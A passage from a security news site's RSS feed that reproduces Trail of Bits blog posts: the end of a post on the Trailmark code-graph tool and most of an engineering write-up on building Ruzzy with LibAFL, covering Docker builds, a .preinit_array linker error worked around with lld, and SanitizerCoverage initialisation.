</span></span><span class="line"><span class="cl">trailmark analyze --complexity <span class="m">10</span> path/to/project</span></span></code></pre>
</figure>
<p>Or call the Python API to build your own skills on top of the graph:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-py" data-lang="py"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">trailmark.query.api</span> <span class="kn">import</span> <span class="n">QueryEngine</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">engine</span> <span class="o">=</span> <span class="n">QueryEngine</span><span class="o">.</span><span class="n">from_directory</span><span class="p">(</span><span class="s2">"path/to/project"</span><span class="p">,</span> <span class="n">language</span><span class="o">=</span><span class="s2">"c"</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># What's reachable from this entrypoint?</span>
</span></span><span class="line"><span class="cl"><span class="n">engine</span><span class="o">.</span><span class="n">callees_of</span><span class="p">(</span><span class="s2">"handle_request"</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Call paths from entrypoint to sensitive function</span>
</span></span><span class="line"><span class="cl"><span class="n">engine</span><span class="o">.</span><span class="n">paths_between</span><span class="p">(</span><span class="s2">"handle_request"</span><span class="p">,</span> <span class="s2">"crypto_verify"</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Functions with cyclomatic complexity &gt;= 10</span>
</span></span><span class="line"><span class="cl"><span class="n">engine</span><span class="o">.</span><span class="n">complexity_hotspots</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Run pre-analysis (blast radius, taint, privilege boundaries)</span>
</span></span><span class="line"><span class="cl"><span class="n">engine</span><span class="o">.</span><span class="n">preanalysis</span><span class="p">()</span></span></span></code></pre>
</figure>
<p>The graph API is designed to be called by skills, not just humans. If you’re building Claude Code skills for security analysis, code review, or test generation, Trailmark gives you the structural substrate to ask questions that lists can’t answer.</p>
<p>Seventeen languages. A graph, not a list. <a href="https://github.com/trailofbits/trailmark">The code is on GitHub</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Extending Ruzzy with LibAFL]]></title>
<description><![CDATA[LibAFL is all the rage in the fuzzing community these days, especially with LLVM’s libFuzzer being placed in maintenance mode. Written in Rust, LibAFL claims improved performance, modularity, state-of-the-art fuzzing techniques, and libFuzzer compatibility. For these reasons, I set out to add Lib...]]></description>
<link>https://tsecurity.de/de/3501373/it-security-nachrichten/extending-ruzzy-with-libafl/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501373/it-security-nachrichten/extending-ruzzy-with-libafl/</guid>
<pubDate>Fri, 08 May 2026 23:18:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>LibAFL is all the rage in the fuzzing community these days, especially with LLVM’s libFuzzer being placed in <a href="https://llvm.org/docs/LibFuzzer.html#status">maintenance mode</a>. Written in Rust, <a href="https://www.s3.eurecom.fr/docs/ccs22_fioraldi.pdf">LibAFL claims</a> improved performance, modularity, state-of-the-art fuzzing techniques, and <a href="https://github.com/AFLplusplus/LibAFL/tree/0.15.4/crates/libafl_libfuzzer">libFuzzer compatibility</a>. For these reasons, I set out to add LibAFL support to <a href="https://github.com/trailofbits/ruzzy">Ruzzy</a>, our coverage-guided fuzzer for pure Ruby code and Ruby C extensions. This gives Ruby developers and security researchers access to a more advanced and actively maintained fuzzing engine without changing how they write their fuzzing harnesses.</p>
<p>Ruzzy was <a href="https://blog.trailofbits.com/2024/03/29/introducing-ruzzy-a-coverage-guided-ruby-fuzzer/">originally built</a> on top of LLVM’s libFuzzer, so using LibAFL’s compatibility layer should be easy enough. However, digging around in the internals of complex systems is never quite as simple as it seems. In this post, I will investigate some of the deep plumbing inside these fuzzing engines, take a detour into executable and linkable format (ELF) files, and ultimately add LibAFL support to Ruzzy.</p>
<h2>Building with libafl_libfuzzer</h2>
<p>Ruzzy currently supports Linux, so I use a <a href="https://github.com/trailofbits/ruzzy/blob/v0.7.0/Dockerfile">Dockerfile</a> for development and for production fuzzing campaigns. To that end, using a similar Dockerfile for LibAFL support is the simplest integration point. LibAFL provides excellent <a href="https://github.com/AFLplusplus/LibAFL/tree/0.15.4/crates/libafl_libfuzzer#usage-as-a-standalone-library-for-ccetc">documentation</a> and build scripts to use it as a standalone library. We need to build LibAFL as a standalone library because Ruzzy uses <a href="https://llvm.org/docs/LibFuzzer.html#using-libfuzzer-as-a-library">libFuzzer as a library</a>.</p>
<p>Following along with the standalone <code>libafl_libfuzzer</code> documentation, and with the <a href="https://github.com/AFLplusplus/LibAFL/blob/0.15.4/crates/libafl_libfuzzer_runtime/build.sh"><code>build.sh</code></a> script in hand, we can build <code>libFuzzer.a</code>. This is the archive that will ultimately be linked into Ruzzy’s C extension and used to fuzz our target. Here are the relevant lines from our new Dockerfile:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-dockerfile" data-lang="dockerfile"><span class="line"><span class="cl"><span class="c"># Install Rust nightly via rustup</span><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">RUN</span> wget -qO- https://sh.rustup.rs <span class="p">|</span> sh -s -- <span class="se">\
</span></span></span><span class="line"><span class="cl"><span class="se"></span> -y <span class="se">\
</span></span></span><span class="line"><span class="cl"><span class="se"></span> --default-toolchain nightly <span class="se">\
</span></span></span><span class="line"><span class="cl"><span class="se"></span> --component llvm-tools<span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">ENV</span> <span class="nv">PATH</span><span class="o">=</span><span class="s2">"/root/.cargo/bin:</span><span class="si">${</span><span class="nv">PATH</span><span class="si">}</span><span class="s2">"</span><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="c"># Clone LibAFL</span><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">RUN</span> git clone --depth <span class="m">1</span> https://github.com/AFLplusplus/LibAFL /libafl<span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="c"># Build libFuzzer.a from LibAFL's libfuzzer runtime</span><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">WORKDIR</span><span class="w"> </span><span class="s">/libafl/crates/libafl_libfuzzer_runtime</span><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">RUN</span> bash build.sh</span></span></code></pre>
 <figcaption><span>Figure 1: Building LibAFL’s libFuzzer.a (Dockerfile.LibAFL)</span></figcaption>
</figure>
<p>This all goes smoothly and gives us our desired output: <code>libFuzzer.a</code>. Next, we need to make a slight tweak to Ruzzy’s mechanism for determining a <code>fuzzer_no_main</code> library. Using <code>fuzzer_no_main</code> and <code>-fsanitize=fuzzer-no-link</code> is libFuzzer’s <a href="https://llvm.org/docs/LibFuzzer.html#using-libfuzzer-as-a-library">standard mechanism</a> for fuzzing code that provides its own <code>main</code> function. This makes sense for interpreted languages because the interpreter, well, brings its own <code>main</code>.</p>
<p>To accomplish the desired flexibility in Ruzzy, we simply need to prioritize an ENV variable, if present, that specifies the <code>fuzzer_no_main</code> library path, then fall back to Clang’s defaults if not:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-ruby" data-lang="ruby"><span class="line hl"><span class="cl"><span class="no">FUZZER_NO_MAIN_LIB_ENV</span> <span class="o">=</span> <span class="s1">'FUZZER_NO_MAIN_LIB'</span>
</span></span><span class="line"><span class="cl"><span class="o">...</span>
</span></span><span class="line hl"><span class="cl"><span class="n">fuzzer_no_main_lib</span> <span class="o">=</span> <span class="no">ENV</span><span class="o">.</span><span class="n">fetch</span><span class="p">(</span><span class="no">FUZZER_NO_MAIN_LIB_ENV</span><span class="p">,</span> <span class="kp">nil</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line hl"><span class="cl"><span class="k">if</span> <span class="n">fuzzer_no_main_lib</span>
</span></span><span class="line"><span class="cl"> <span class="no">LOGGER</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s2">"Using </span><span class="si">#{</span><span class="no">FUZZER_NO_MAIN_LIB_ENV</span><span class="si">}</span><span class="s2">=</span><span class="si">#{</span><span class="n">fuzzer_no_main_lib</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="k">unless</span> <span class="no">File</span><span class="o">.</span><span class="n">exist?</span><span class="p">(</span><span class="n">fuzzer_no_main_lib</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="no">LOGGER</span><span class="o">.</span><span class="n">error</span><span class="p">(</span><span class="s2">"</span><span class="si">#{</span><span class="no">FUZZER_NO_MAIN_LIB_ENV</span><span class="si">}</span><span class="s2"> file does not exist: </span><span class="si">#{</span><span class="n">fuzzer_no_main_lib</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="nb">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="k">end</span>
</span></span><span class="line hl"><span class="cl"><span class="k">else</span>
</span></span><span class="line"><span class="cl"> <span class="n">fuzzer_no_main_libs</span> <span class="o">=</span> <span class="o">[</span>
</span></span><span class="line"><span class="cl"> <span class="s1">'libclang_rt.fuzzer_no_main.a'</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="s1">'libclang_rt.fuzzer_no_main-aarch64.a'</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="s1">'libclang_rt.fuzzer_no_main-x86_64.a'</span>
</span></span><span class="line"><span class="cl"> <span class="o">]</span>
</span></span><span class="line hl"><span class="cl"> <span class="n">fuzzer_no_main_lib</span> <span class="o">=</span> <span class="n">fuzzer_no_main_libs</span><span class="o">.</span><span class="n">map</span> <span class="p">{</span> <span class="o">|</span><span class="n">lib</span><span class="o">|</span> <span class="n">get_clang_file_name</span><span class="p">(</span><span class="n">lib</span><span class="p">)</span> <span class="p">}</span><span class="o">.</span><span class="n">find</span><span class="p">(</span><span class="o">&amp;</span><span class="ss">:itself</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="k">unless</span> <span class="n">fuzzer_no_main_lib</span>
</span></span><span class="line"><span class="cl"> <span class="no">LOGGER</span><span class="o">.</span><span class="n">error</span><span class="p">(</span><span class="s2">"Could not find fuzzer_no_main using </span><span class="si">#{</span><span class="no">CC</span><span class="si">}</span><span class="s2">."</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="no">LOGGER</span><span class="o">.</span><span class="n">error</span><span class="p">(</span><span class="s2">"Please include </span><span class="si">#{</span><span class="no">CC</span><span class="si">}</span><span class="s2"> in your path or specify </span><span class="si">#{</span><span class="no">FUZZER_NO_MAIN_LIB_ENV</span><span class="si">}</span><span class="s2"> ENV variable."</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="nb">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="k">end</span>
</span></span><span class="line"><span class="cl"><span class="k">end</span></span></span></code></pre>
 <figcaption><span>Figure 2: Allowing an ENV override for the fuzzing library (ext/cruzzy/extconf.rb)</span></figcaption>
</figure>
<p>Now, let’s build Ruzzy with LibAFL’s <code>libFuzzer.a</code>:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-dockerfile" data-lang="dockerfile"><span class="line"><span class="cl"><span class="c"># Copy LibAFL's libFuzzer.a from builder stage</span><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">COPY</span> --from<span class="o">=</span>libafl-builder /libafl/crates/libafl_libfuzzer_runtime/ libFuzzer.a /usr/lib/libFuzzer.a<span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="c"># Point Ruzzy at LibAFL's libFuzzer instead of clang's built-in</span><span class="err">
</span></span></span><span class="line hl"><span class="cl"><span class="err"></span><span class="k">ENV</span> <span class="nv">FUZZER_NO_MAIN_LIB</span><span class="o">=</span><span class="s2">"/usr/lib/libFuzzer.a"</span><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">WORKDIR</span><span class="w"> </span><span class="s">ruzzy</span>/<span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">COPY</span> . .<span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">RUN</span> gem build<span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">RUN</span> <span class="nv">RUZZY_DEBUG</span><span class="o">=</span><span class="m">1</span> gem install --development --verbose ruzzy-*.gem</span></span></code></pre>
 <figcaption><span>Figure 3: Building Ruzzy with LibAFL using a custom FUZZER_NO_MAIN_LIB (Dockerfile.LibAFL)</span></figcaption>
</figure>
<p>However, this produces the following error:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">INFO -- : Using FUZZER_NO_MAIN_LIB=/usr/lib/libFuzzer.a
</span></span><span class="line"><span class="cl">DEBUG -- : Search for libclang_rt.asan.a using clang-21: success=true exists=false
</span></span><span class="line"><span class="cl">DEBUG -- : Search for libclang_rt.asan-aarch64.a using clang-21: success=true exists=true
</span></span><span class="line"><span class="cl">DEBUG -- : Search for libclang_rt.asan-x86_64.a using clang-21: success=true exists=false
</span></span><span class="line"><span class="cl">DEBUG -- : Creating /usr/lib/llvm-21/lib/clang/21/lib/linux/libclang_rt.asan-aarch64.a sanitizer archive at /tmp/20260320-20-683d0b
</span></span><span class="line"><span class="cl">DEBUG -- : Merging sanitizer at /tmp/20260320-20-683d0b with libFuzzer at /usr/lib/libFuzzer.a to asan_with_fuzzer.so
</span></span><span class="line hl"><span class="cl">/usr/bin/ld: /usr/lib/libFuzzer.a(libFuzzer.o): .preinit_array section is not allowed in DSO
</span></span><span class="line hl"><span class="cl">/usr/bin/ld: failed to set dynamic section sizes: nonrepresentable section on output
</span></span><span class="line hl"><span class="cl">clang++-21: error: linker command failed with exit code 1 (use -v to see invocation)
</span></span><span class="line"><span class="cl">ERROR -- : The clang++-21 shared object merging command failed.
</span></span><span class="line"><span class="cl">*** extconf.rb failed ***</span></span></code></pre>
 <figcaption><span>Figure 4: Failure linking libFuzzer.a</span></figcaption>
</figure>
<p>The key error here is “<code>.preinit_array</code> section is not allowed in DSO.” This was a new one for me. What is a <code>.preinit_array</code> section, and what is this error trying to tell me? The relevant <a href="https://refspecs.linuxbase.org/elf/gabi4+/ch5.dynamic.html#init_fini">ELF documentation</a> states the following:</p>
<blockquote>
Finally, <mark>an executable file may have pre-initialization functions.</mark> These functions are executed after the dynamic linker has built the process image and performed relocations but before any shared object initialization functions. <mark>Pre-initialization functions are not permitted in shared objects.</mark><br>
...<br>
The DT_PREINIT_ARRAY table is processed <mark>only in an executable file; it is ignored if contained in a shared object.</mark>
</blockquote>
<p>So dynamic shared objects (DSOs) cannot contain a <code>.preinit_array</code> section. This is exactly what the error told us. <code>.init</code>, <code>.ctors</code>, <code>.init_array</code>, and <code>.preinit_array</code> are all mechanisms for running code before <code>main</code> starts in an ELF binary. Exploring each of these and the order in which they’re run is beyond the scope of this post (see <a href="https://maskray.me/blog/2021-11-07-init-ctors-init-array">this explanation</a>), but suffice it to say we need to sidestep this <code>libafl_libfuzzer</code> implementation detail. Here’s how LibAFL and libFuzzer differ in this regard:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">$ objdump -h /usr/lib/libFuzzer.a <span class="p">|</span> grep <span class="s1">'init_array'</span>
</span></span><span class="line hl"><span class="cl"><span class="m">3100</span> .init_array <span class="m">00000228</span> ...
</span></span><span class="line hl"><span class="cl"><span class="m">5047</span> .preinit_array <span class="m">00000008</span> ...
</span></span><span class="line"><span class="cl"><span class="m">32136</span> .init_array.00099 <span class="m">00000008</span> ...
</span></span><span class="line"><span class="cl"><span class="m">37083</span> .init_array.90 <span class="m">00000010</span> ...
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">$ objdump -h libclang_rt.fuzzer-aarch64.a <span class="p">|</span> grep <span class="s1">'init_array'</span>
</span></span><span class="line hl"><span class="cl"> <span class="m">40</span> .init_array <span class="m">00000008</span> ...
</span></span><span class="line"><span class="cl"> <span class="m">57</span> .init_array <span class="m">00000008</span> ...
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">$ objdump -h libclang_rt.fuzzer_no_main-aarch64.a <span class="p">|</span> grep <span class="s1">'init_array'</span>
</span></span><span class="line hl"><span class="cl"> <span class="m">40</span> .init_array <span class="m">00000008</span> ...
</span></span><span class="line"><span class="cl"> <span class="m">57</span> .init_array <span class="m">00000008</span> ...
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">$ objdump -h libclang_rt.fuzzer_interceptors-aarch64.a <span class="p">|</span> grep <span class="s1">'init_array'</span>
</span></span><span class="line hl"><span class="cl"> <span class="m">21</span> .preinit_array <span class="m">00000008</span> ...</span></span></code></pre>
 <figcaption><span>Figure 5: .init_array vs. .preinit_array in LibAFL vs. libFuzzer</span></figcaption>
</figure>
<p>The figure above shows that LibAFL’s archive contains both <code>.init_array</code> and <code>.preinit_array</code> sections whereas Clang’s libFuzzer splits them across different files. Since LibAFL uses the <a href="https://github.com/AFLplusplus/LibAFL/blob/0.15.4/crates/libafl_targets/src/libfuzzer/FuzzerInterceptors.cpp#L1-L13">same interceptor code</a> as Clang, it also defines the same <a href="https://github.com/AFLplusplus/LibAFL/blob/0.15.4/crates/libafl_targets/src/libfuzzer/FuzzerInterceptors.cpp#L199-L200"><code>.preinit_array</code></a>. The problem is that LibAFL provides <a href="https://github.com/AFLplusplus/LibAFL/blob/0.15.4/crates/libafl_targets/Cargo.toml#L37"><code>libfuzzer_no_link_main</code></a> and <a href="https://github.com/AFLplusplus/LibAFL/blob/0.15.4/crates/libafl_targets/Cargo.toml#L39"><code>libfuzzer_interceptors</code></a> features, but we cannot easily toggle them at build time.</p>
<p>This leaves us with two options: the proper solution, which is to propose a change upstream that allows these features to be toggled at build time, and the hacky, make-it-work solution. I wanted to keep moving forward and see this work end-to-end, so I started with the hacky solution. This required having a trick up our sleeve: GNU <code>ld</code> enforces the <code>.preinit_array</code>-in-a-DSO constraint, but LLVM <code>ld</code> does not. So we can modify Ruzzy’s build procedure to allow passing a user defined <code>ld</code> path at build time:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-diff" data-lang="diff"><span class="line"><span class="cl"><span class="gh">diff --git a/Dockerfile.LibAFL b/Dockerfile.LibAFL
</span></span></span><span class="line"><span class="cl"><span class="gh">index 5d0f9516..df6be2e2 100644
</span></span></span><span class="line"><span class="cl"><span class="gh"></span><span class="gd">--- a/Dockerfile.LibAFL
</span></span></span><span class="line"><span class="cl"><span class="gd"></span><span class="gi">+++ b/Dockerfile.LibAFL
</span></span></span><span class="line"><span class="cl"><span class="gi"></span><span class="gu">@@ -54,9 +54,12 @@ RUN echo "deb http://apt.llvm.org/bookworm/ llvm-toolchain-bookworm-$LLVM_VERSION
</span></span></span><span class="line"><span class="cl"><span class="gu"></span> &amp;&amp; echo "deb-src http://apt.llvm.org/bookworm/ llvm-toolchain-bookworm-$LLVM_VERSION main" &gt;&gt; /etc/apt/sources.list.d/ llvm.list \
</span></span><span class="line"><span class="cl"> &amp;&amp; wget -qO- https://apt.llvm.org/llvm-snapshot.gpg.key &gt; /etc/apt/trusted.gpg.d/apt.llvm.org.asc
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="gi">+# Install lld alongside clang. LibAFL's libFuzzer.a contains a .preinit_array
</span></span></span><span class="line"><span class="cl"><span class="gi">+# .preinit_array section that the GNU linker rejects in shared objects.
</span></span></span><span class="line"><span class="cl"><span class="gi">+# lld handles this correctly.
</span></span></span><span class="line"><span class="cl"><span class="gi"></span> RUN apt update &amp;&amp; apt install -y \
</span></span><span class="line"><span class="cl"> build-essential \
</span></span><span class="line"><span class="cl"> clang-$LLVM_VERSION \
</span></span><span class="line"><span class="cl"><span class="gi">+ lld-$LLVM_VERSION \
</span></span></span><span class="line"><span class="cl"><span class="gi"></span> &amp;&amp; rm -rf /var/lib/apt/lists/*
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> ENV APP_DIR="/app"
</span></span><span class="line"><span class="cl"><span class="gu">@@ -69,6 +72,10 @@ ENV LDSHARED="clang-$LLVM_VERSION -shared"
</span></span></span><span class="line"><span class="cl"><span class="gu"></span> ENV LDSHAREDXX="clang++-$LLVM_VERSION -shared"
</span></span><span class="line"><span class="cl"> ENV ASAN_SYMBOLIZER_PATH="/usr/bin/llvm-symbolizer-$LLVM_VERSION"
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="gi">+# Use lld for linking. LibAFL's libFuzzer.a contains a .preinit_array section
</span></span></span><span class="line"><span class="cl"><span class="gi">+# that the GNU linker rejects in shared objects. lld handles this correctly.
</span></span></span><span class="line"><span class="cl"><span class="gi">+ENV LD="lld-$LLVM_VERSION"
</span></span></span><span class="line"><span class="cl"><span class="gi">+
</span></span></span><span class="line"><span class="cl"><span class="gi"></span> ENV MAKE="make --environment-overrides V=1"
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> ENV ASAN_OPTIONS="symbolize=1:allocator_may_return_null=1:
</span></span><span class="line"><span class="cl">detect_leaks=0:use_sigaltstack=0"
</span></span><span class="line"><span class="cl"><span class="gh">diff --git a/ext/cruzzy/extconf.rb b/ext/cruzzy/extconf.rb
</span></span></span><span class="line"><span class="cl"><span class="gh">index 6f474e62..260fcae6 100644
</span></span></span><span class="line"><span class="cl"><span class="gh"></span><span class="gd">--- a/ext/cruzzy/extconf.rb
</span></span></span><span class="line"><span class="cl"><span class="gd"></span><span class="gi">+++ b/ext/cruzzy/extconf.rb
</span></span></span><span class="line"><span class="cl"><span class="gi"></span><span class="gu">@@ -19,6 +19,7 @@ LOGGER.level = ENV.key?('RUZZY_DEBUG') ?
</span></span></span><span class="line"><span class="cl"><span class="gu"></span>Logger::DEBUG : Logger::INFO
</span></span><span class="line"><span class="cl"> CC = ENV.fetch('CC', 'clang')
</span></span><span class="line"><span class="cl"> CXX = ENV.fetch('CXX', 'clang++')
</span></span><span class="line"><span class="cl"> AR = ENV.fetch('AR', 'ar')
</span></span><span class="line"><span class="cl"><span class="gi">+LD = ENV.fetch('LD', 'ld')
</span></span></span><span class="line"><span class="cl"><span class="gi"></span> FUZZER_NO_MAIN_LIB_ENV = 'FUZZER_NO_MAIN_LIB'
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> LOGGER.debug("Ruby CC: #{RbConfig::CONFIG['CC']}")
</span></span><span class="line"><span class="cl"><span class="gu">@@ -66,6 +67,7 @@ def merge_sanitizer_libfuzzer_lib(sanitizer_lib,
</span></span></span><span class="line"><span class="cl"><span class="gu"></span>fuzzer_no_main_lib, merged_outp
</span></span><span class="line"><span class="cl"> '-ldl',
</span></span><span class="line"><span class="cl"> '-lstdc++',
</span></span><span class="line"><span class="cl"> '-shared',
</span></span><span class="line"><span class="cl"><span class="gi">+ "-fuse-ld=#{LD}",
</span></span></span><span class="line"><span class="cl"><span class="gi"></span> '-o',
</span></span><span class="line"><span class="cl"> merged_output
</span></span><span class="line"><span class="cl"> )
</span></span><span class="line"><span class="cl"><span class="gu">@@ -145,5 +147,6 @@ merge_sanitizer_libfuzzer_lib(
</span></span></span><span class="line"><span class="cl"><span class="gu"></span> $LOCAL_LIBS = fuzzer_no_main_lib
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> $LIBS &lt;&lt; ' -lstdc++'
</span></span><span class="line"><span class="cl"><span class="gi">+$DLDFLAGS &lt;&lt; " -fuse-ld=#{LD}"
</span></span></span><span class="line"><span class="cl"><span class="gi"></span>
</span></span><span class="line"><span class="cl"> create_makefile('cruzzy/cruzzy')
</span></span></code></pre>
 <figcaption><span>Figure 6: Allow a user-specified ld binary</span></figcaption>
</figure>
<p>And now the Docker build works! But building the fuzzing libraries, Ruby C extension, and Docker image is only the first step. We still have to run the fuzzer, which comes with its own set of challenges.</p>
<p>As for the proper fix I mentioned earlier, we did propose it upstream in <a href="https://github.com/AFLplusplus/LibAFL/pull/3734">this pull request</a>. Once that’s merged, we can run the build script with <code>--cargo-args "--no-default-features --features no_link_main"</code> and avoid the <code>ld</code> hack. Now, on to running the fuzzer.</p>
<h2>Fuzzing with LibAFL</h2>
<p>Ruzzy includes its own <a href="https://github.com/trailofbits/ruzzy/blob/v0.7.0/ext/dummy/dummy.c">“dummy” C extension</a> for testing the fuzzer and making sure everything is working as expected. We can use this to test out our LibAFL changes and make sure they’re working properly. After building the fuzzer and finally being able to start it, I got the following error:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">$ docker run --rm ruzzy-libafl -runs=100000
</span></span><span class="line"><span class="cl">thread '&lt;unnamed&gt;' (9) panicked at src/fuzz.rs:275:5:
</span></span><span class="line hl"><span class="cl">No maps available; cannot fuzz!
</span></span><span class="line"><span class="cl">note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
</span></span><span class="line"><span class="cl">fatal runtime error: failed to initiate panic, error 2786066624, aborting
</span></span><span class="line"><span class="cl">/usr/local/bundle/gems/ruzzy-0.7.0/lib/ruzzy.rb:15: [BUG] Aborted at 0x0000000000000009
</span></span><span class="line"><span class="cl">ruby 4.0.1 (2026-01-13 revision e04267a14b) +PRISM [aarch64-linux]
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">-- Control frame information -----------------------------------------------
</span></span><span class="line"><span class="cl">c:0005 p:---- s:0022 e:000021 l:y b:---- CFUNC :c_fuzz
</span></span><span class="line"><span class="cl">c:0004 p:0011 s:0016 e:000015 l:y b:0001 METHOD /usr/local/bundle/gems/ruzzy-0.7.0/lib/ruzzy.rb:15
</span></span><span class="line"><span class="cl">c:0003 p:0008 s:0010 E:001390 l:y b:0001 METHOD /usr/local/bundle/gems/ruzzy-0.7.0/lib/ruzzy.rb:28
</span></span><span class="line"><span class="cl">c:0002 p:0010 s:0006 e:000005 l:n b:---- EVAL -e:1 [FINISH]
</span></span><span class="line"><span class="cl">c:0001 p:0000 s:0003 E:000940 l:y b:---- DUMMY [FINISH]
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">-- Ruby level backtrace information ----------------------------------------
</span></span><span class="line"><span class="cl">-e:1:in '&lt;main&gt;'
</span></span><span class="line hl"><span class="cl">/usr/local/bundle/gems/ruzzy-0.7.0/lib/ruzzy.rb:28:in 'dummy'
</span></span><span class="line hl"><span class="cl">/usr/local/bundle/gems/ruzzy-0.7.0/lib/ruzzy.rb:15:in 'fuzz'
</span></span><span class="line hl"><span class="cl">/usr/local/bundle/gems/ruzzy-0.7.0/lib/ruzzy.rb:15:in 'c_fuzz'
</span></span><span class="line"><span class="cl">...</span></span></code></pre>
 <figcaption><span>Figure 7: Runtime error when starting the fuzzer</span></figcaption>
</figure>
<p>The key error here is “No maps available; cannot fuzz!” This <a href="https://github.com/AFLplusplus/LibAFL/blob/0.15.4/crates/libafl_libfuzzer/runtime/src/lib.rs#L552-L569">LibAFL error</a> occurs when the <a href="https://clang.llvm.org/docs/SanitizerCoverage.html">SanitizerCoverage</a> state is not initialized properly. To understand this discrepancy between LibAFL and libFuzzer, we must first understand what SanitizerCoverage is and how it works.</p>
<p>SanitizerCoverage tracks code coverage information during a fuzzing campaign to improve performance. Simple heuristics like “if we’ve discovered new code coverage, then continue to mutate relevant inputs to better explore these code paths” are powerful fuzzing primitives. The underlying theory is that higher code coverage results in more crashes and bugs (I’m oversimplifying, but you get the point). To that end, a fuzzing engine needs a mechanism for initializing and tracking coverage information.</p>
<p>SanitizerCoverage offers a variety of ways to track coverage information, all of which require a mechanism to initialize state at the beginning of a fuzzing campaign. For example, <a href="https://clang.llvm.org/docs/SanitizerCoverage.html#introduction">the documentation</a> offers <code>pc-guard</code>, <code>8bit-counters</code>, <code>bool-flag</code>, and <code>pc-table</code> tracing mechanisms, each with a corresponding <code>init</code> function. These <a href="https://github.com/llvm/llvm-project/blob/llvmorg-22.1.1/llvm/lib/Transforms/Instrumentation/SanitizerCoverage.cpp#L76-L80"><code>init</code> functions</a> are eventually lowered and represented as <a href="https://github.com/llvm/llvm-project/blob/llvmorg-22.1.1/llvm/lib/CodeGen/TargetLoweringObjectFileImpl.cpp#L1155-L1157"><code>.init_array</code> entries</a> in ELF files (<code>.init_array</code> strikes again). This means that, ultimately, coverage initialization functionality is called when the DSO is loaded at runtime.</p>
<p>Back to the error at hand: why is LibAFL saying “No maps available; cannot fuzz!” while LLVM’s libFuzzer starts up just fine? The key distinction is that libFuzzer lazily allows new coverage counter arrays to be included at runtime and does not complain if none exist at startup. LibAFL, however, requires them to be defined when the fuzzer starts. Compare the following sequence of events:</p>
<ul>
<li>LibAFL <a href="https://github.com/AFLplusplus/LibAFL/blob/0.15.4/crates/libafl_libfuzzer/runtime/src/lib.rs#L605"><code>LLVMFuzzerRunDriver</code></a>
<ul>
